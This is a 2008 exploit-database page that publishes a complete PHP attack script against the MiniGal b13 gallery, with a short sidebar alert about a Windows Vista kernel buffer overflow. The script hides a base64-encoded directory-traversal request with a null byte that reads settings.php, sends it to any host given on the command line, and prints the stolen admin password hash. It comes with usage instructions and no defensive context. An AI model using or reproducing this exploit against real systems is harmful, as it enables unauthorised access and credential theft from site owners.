|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : ExploitAlert | ||
 ExploitAlert : 5139 Milw0rm ID : 7130 Credit : Alfons Luja Date : 18.11.2008 Exploit Code : <?php set_time_limit(0); function find_pass($data){ $tab = explode('$gallerycopyright = ',$data); $tab1 = explode('$version = "B13";',$tab[1]); $tab2 = explode('$adminpass = "',$tab1[0]); if($tab2[1]!=""){ echo("Vuln exploited enjoy !\n"); echo sleep(1); echo("Admin hash == [".substr($tab2[1],0,32)."]\n"); } else{ echo("Exploit failed!!!!"); } } function __send($pack,$host,$port){ $ret = ""; $desc = fsockopen($host,$port,$errno, $errstr, 30); if(!$desc){ echo("Socket say:($errno).[$errstr]"); return; } echo("Sending payload !!\n"); fwrite($desc,$pack); while(!feof($desc)){ $ret.=fgets($desc); } fclose($desc); find_pass($ret); } echo("\n=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+\n". "+ MiniGal b13 Source Code Disclosure +\n". "+ Alfons Luja +\n". "+ -------------------------------------------- +\n". "+ Usage poc.php path host port +\n". "+ ex: poc.php /press/ wwww.doda.net.pl 80 +\n". "+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=\n"); if($argc<3){ die("Path - host - Port - comprendo ?"); } $path = $argv[1]; $host = $argv[2]; $port = $argv[3]; $packet = "GET ".$path.base64_decode("aW5kZXgucGhwP2xpc3Q9Li4vc2V0dGluZ3MucGhwJTAwIEhUVFAv MS4x")."\r\n"; $packet .= "Host:".$host."\r\n"; $packet .= "Keep-Alive: 300\r\n"; $packet .= "Connection: keep-alive\r\n\r\n"; echo("\nConnecting to $host\n"); __send($packet,$host,$port); ?> |
||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP |
||
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |